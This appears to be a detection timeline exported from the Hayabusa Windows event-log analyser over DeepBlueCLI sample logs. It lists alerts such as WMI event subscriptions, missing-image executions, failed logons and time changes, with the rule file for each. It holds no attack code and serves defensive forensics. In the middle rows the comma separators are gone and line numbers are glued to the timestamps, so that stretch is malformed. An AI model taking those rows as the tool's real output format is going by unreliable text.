2013-10-24 04:34:43.415 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:43:44.838 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:44:02.385 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:48:32.133 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3212013-10-24 04:57:31.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3222013-10-24 04:59:43.385 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3232013-10-24 05:17:38.760 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3242013-10-24 05:21:25.557 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3252013-10-24 05:27:57.838 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3262013-10-24 05:38:14.682 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3272013-10-24 05:49:57.323 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x1917frules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3282013-10-24 05:53:53.609 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3292013-10-24 05:53:53.609 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3302013-10-24 05:54:11.078 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3312013-10-24 05:54:23.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
3322013-10-24 05:54:29.619 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3332013-10-24 05:54:29.619 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3342013-10-24 05:54:29.619 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3352013-10-24 05:55:00.775 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3362013-10-24 05:55:00.775 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3372013-10-24 05:55:00.775 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3382013-10-24 05:55:00.775 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x2b15erules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
3392013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3402013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3412013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3422013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3432013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3442013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3452013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3462013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3472013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3482013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3492013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3502013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3512013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3522013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3532013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3542013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3552013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3562013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3572013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3582013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3592013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3602013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3612013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3622013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3632013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3642013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3652013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3662013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3672013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3682013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3692013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3702013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3712013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3722013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3732013-10-24 05:56:26.259 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3742013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3752013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3762013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3772013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3782013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3792013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3802013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3812013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3822013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3832013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3842013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3852013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3862013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3872013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3882013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3892013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3902013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3912013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3922013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3932013-10-24 05:56:26.275 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
3942013-10-24 05:56:28.619 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
